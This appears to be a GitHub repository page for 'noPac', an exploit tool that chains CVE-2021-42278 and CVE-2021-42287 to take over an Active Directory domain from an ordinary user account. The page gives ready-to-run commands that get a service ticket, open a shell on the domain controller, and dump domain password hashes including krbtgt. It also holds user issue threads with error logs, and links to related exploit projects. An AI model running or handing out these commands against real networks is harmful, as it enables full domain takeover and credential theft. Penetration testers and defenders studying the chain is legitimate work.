Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Overview

About

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Changed from sam-the-admin.

Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
  [domain/]username[:password]
                        Account used to authenticate to DC.

optional arguments:
  -h, --help            show this help message and exit
  --impersonate IMPERSONATE
                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
  -domain-netbios NETBIOSNAME
                        Domain NetBIOS name. Required if the DC has multiple domains.
  -new-name NEWNAME     Add new computer name, if not specified, will be random generated.
  -debug                Turn DEBUG output ON
  -ts                   Adds timestamp to every logging output
  -shell                Drop a shell via smbexec
  -dump                 Dump Hashs via secretsdump
  -use-ldap             Use LDAP instead of LDAPS

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
  -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
  -port [destination port]
                        Destination port to connect to SMB Server
  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)
  -share SHARE          share where the output will be grabbed from (default ADMIN$)
  -shell-type {cmd,powershell}
                        choose a command processor for the semi-interactive shell
  -codec CODEC          Sets encoding used (codec) from the target's output (default "GBK").
  -service-name service_name
                        The name of theservice used to trigger the payload

dump options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap .

GetST

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

Auto get shell

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

Dump hash

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt

Scanner

python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

Comments
  • SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

    SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

    Hello, I got this error when I try to execute this command :

    python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.100 -dc-host dc -shell --impersonate root2 -use-ldap

    target system : Windows Server 2022 (Sept 2021)

    Strange, because I have a smb share on this target lab.

    error

    Have you any idea to resolv this issue ?

    Best regards,

    opened by archidote 8
  • STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

    STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

    Hello, I got this error when I try to execute this command :

    python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.101 -dc-host dc-ws16 -shell --impersonate root2 -use-ldap

    target system : Windows Server 2016 (Build version : 14393.1884 )

    Strange, because I have a smb share on this target lab, and ADDS/DNS rôles (linked to my lab domain)

    Windows Defender does not flag nothing....

    Lab configuration :

    dc.lgds.local (ws22) : 192.168.130.100 dc-ws16.lgds.local (ws16) : 192.168.130.101 kali linux : 192.168.130.128

    image

    Have you got any idea ?

    Best regards,

    opened by archidote 1
  • [-] Pls use full domain name, such as: domain.com/username

    [-] Pls use full domain name, such as: domain.com/username

    my domain looks like this: sub1.sub0.domain.com guess the issue might be in this line: 109 check_domain = ".".join(domain_dumper.getRoot().replace("DC=","").split(","))

    opened by sas060 1
  • [-] Missing required parameter 'digestmod'.

    [-] Missing required parameter 'digestmod'.

    Good afternoon,

    Everything was working properly yesterday.. today I got the following error:

    ─$ python3 noPac.py 'domain.local'/user:'password' -dc-ip 172.16.2.x -dc-host dc-hostname --impersonate administrator -dump -use-ldap -debug
    
    ███    ██  ██████  ██████   █████   ██████ 
    ████   ██ ██    ██ ██   ██ ██   ██ ██      
    ██ ██  ██ ██    ██ ██████  ███████ ██      
    ██  ██ ██ ██    ██ ██      ██   ██ ██      
    ██   ████  ██████  ██      ██   ██  ██████ 
                                               
                                            
        
    [+] Impacket Library Installation Path: /home/kali/.local/lib/python3.9/site-packages/impacket
    Traceback (most recent call last):
      File "/home/kali/Toys/noPac/noPac.py", line 385, in <module>
        samtheadmin(username, password, domain, options)
      File "/home/kali/Toys/noPac/noPac.py", line 95, in samtheadmin
        ldap_server, ldap_session = init_ldap_session(options, domain, username, password, lmhash, nthash)
      File "/home/kali/Toys/noPac/utils/helper.py", line 255, in init_ldap_session
        return init_ldap_connection(target, args.use_ldap, args, domain, username, password, lmhash, nthash)
      File "/home/kali/Toys/noPac/utils/helper.py", line 242, in init_ldap_connection
        ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 321, in __init__
        self.do_auto_bind()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 338, in do_auto_bind
        self.bind(read_server_info=True)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 563, in bind
        response = self.do_ntlm_bind(controls)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 1302, in do_ntlm_bind
        request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client, result['server_creds'])
      File "/usr/local/lib/python3.9/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
        server_creds = name.create_authenticate_message()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
        nt_challenge_response = self.compute_nt_response()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
        response_key_nt = self.ntowf_v2()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
        return hmac.new(password_digest, (self.user_name.upper() + self.user_domain).encode('utf-16-le')).digest()
      File "/usr/lib/python3.9/hmac.py", line 170, in new
        return HMAC(key, msg, digestmod)
      File "/usr/lib/python3.9/hmac.py", line 56, in __init__
        raise TypeError("Missing required parameter 'digestmod'.")
    TypeError: Missing required parameter 'digestmod'.
    [-] Missing required parameter 'digestmod'.
    
    
    
    
    opened by rockabillycat666 1
  • SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

    SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

    Running noPac against 2016 DC and receiving the following error. Tried hard-coding the machine account name and password with no success.

    `└─# python3 /opt/noPac/noPac.py domain/user:'password' -dc-ip 192.168.1.12

    ███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██
    ██ ██ ██ ██ ██ ██████ ███████ ██
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██ ████ ██████ ██ ██ ██ ██████

    [*] Current ms-DS-MachineAccountQuota = 10 [*] We have more than one target, Pls choices the hostname of the -dc-ip you input. [*] 0: dc1 [*] 1: dc2

    Your choice: 0 [*] Selected Target dc1.domain.local [*] Total Domain Admins 7 [*] will try to impersonat admin [*] Adding Computer Account "WIN-AJKEBM3GBHT" [*] MachineAccount "WIN-AJKEBM3GBHT" password = j2ZLU0Y@7uOL [-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.`

    opened by sm00v 1
  • maq=0 Method 1 test failed

    maq=0 Method 1 test failed

    在08,12域控上测试,查找具备修改的用户,测试失败:

    C:\Users\Administrator\Desktop>AdFind.exe -b "CN=Computers,DC=xxx,DC=com" -sc g etacls -sddlfilter ;;"[WRT PROP]";;computer;xxx\test -recmute

    AdFind V01.52.00cpp Joe Richards ([email protected]) January 2020

    Using server: AD.xxx.com:389 Directory: Windows Server 2012 R2

    dn:CN=win7,CN=Computers,DC=xxx,DC=com

    nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];Logon Information;computer;B OSS\test nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];description;computer;xxx\te st nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];displayName;computer;xxx\te st nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];sAMAccountName;computer;xxx \test

    python.exe nopac.py xxx.com/test:Admin123 -dc-ip 192.168.xxx.xxx -dc-host ad.xxx.com --impersonate administrator -no-add -new-name win7$ -use-ldap

    [*] Current ms-DS-MachineAccountQuota = 0 [*] win7$ already exists! Using force mode. {'attributes': {'ms-DS-MachineAccountQuota': [], 'objectSid': ['S-1-5-21-722558688-90111164-1262859035-2608']}, 'dn': 'CN=win7,CN=Computers,DC=xxx,DC=com'} {'result': 53, 'description': 'unwillingToPerform', 'dn': '', 'message': '0000001F: SvcErr: DSID-031A12D2, problem 5003 (WILL_NOT_PERFORM), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'} [-] Cannot change the machine password , exit.

    计算机用户、域用户 需要做特别的设置?

    opened by ki11y0u 1
  • Why

    Why "automatic bind not successful - invalidCredentials" error?

    Hi Thanks for the upload, I tried different user but get same error.

    PS C:\tools\NOPAC\noPac-main\noPac-main> python noPac.py contoso.com/user01:'P@ssw0rd' -dc-ip 192.168.200.100

    automatic bind not successful - invalidCredentials

    image

    opened by RENYONGTONG 1
  • Update noPac.py

    Update noPac.py

    Include uppercase variant of 'domain' in conditional on line 100 since 'namingcontexts' for 'DC=*' via ldap reply is in uppercase. I figure this line is 'script kiddie proof', and may also teach those learning the industry(such as myself) to diagnose why a tool isn't working. I figured it wouldn't hurt to suggest it. Awesome tool, by the way.

    opened by Business1sg00d 0
  • Clock skew too great

    Clock skew too great

    When i try to exploit Active Directory it return these error. I use kali linux 2021. Please help....

    GetTGT error, error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

    opened by DerXanRam 1
  • [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier.

    [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier.

    Running noPac against 2019 DC and receiving the following error #:proxychains4 python3 noPac.py xxx/user:'password' -dc-ip 10.10.10.140 -dc-host ad01 -shell --impersonate administrator
    [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-4-g04023d3

    ███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██
    ██ ██ ██ ██ ██ ██████ ███████ ██
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██ ████ ██████ ██ ██ ██ ██████

    [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:389 ... OK [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target AD01.nasa.gov [*] will try to impersonat administrator [*] Adding Computer Account "WIN-GQ5YXH1Y39S$" [*] MachineAccount "WIN-GQ5YXH1Y39S$" password = ^%rX!ZNIV#0v [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:445 ... OK [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier. image

    opened by L0serH4 0
Owner
Evi1cg
持一颗清静无为平淡心,宠辱不惊,来去不忧。
Evi1cg
Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

W4ter 2 Jun 23, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Oliver Lyak 250 Dec 31, 2022
Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

Oliver Lyak 140 Dec 27, 2022
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

null 81 Dec 20, 2022
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

null 96 Jan 2, 2023
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

null 96 Dec 14, 2022
Python tool for exploiting CVE-2021-35616

OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: ► Username enumeration ►

null 11 Dec 6, 2022
an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to.

QAX A-Team 71 Nov 30, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

null 20 Apr 7, 2022
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell) usage: python ProxyLogon.py --host=exchang

null 112 Dec 1, 2022
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

null 567 Dec 30, 2022
CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

antx 365 Nov 30, 2022
CVE-2022-22536 - SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536

CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22

antx 49 Nov 9, 2022
Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

东方有鱼名为咸 135 Dec 14, 2022
CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Duarte Duarte 20 Aug 25, 2022
WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user.

WinRemoteEnum WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user, sharing the goal of remotely gather

Simon 9 Nov 9, 2022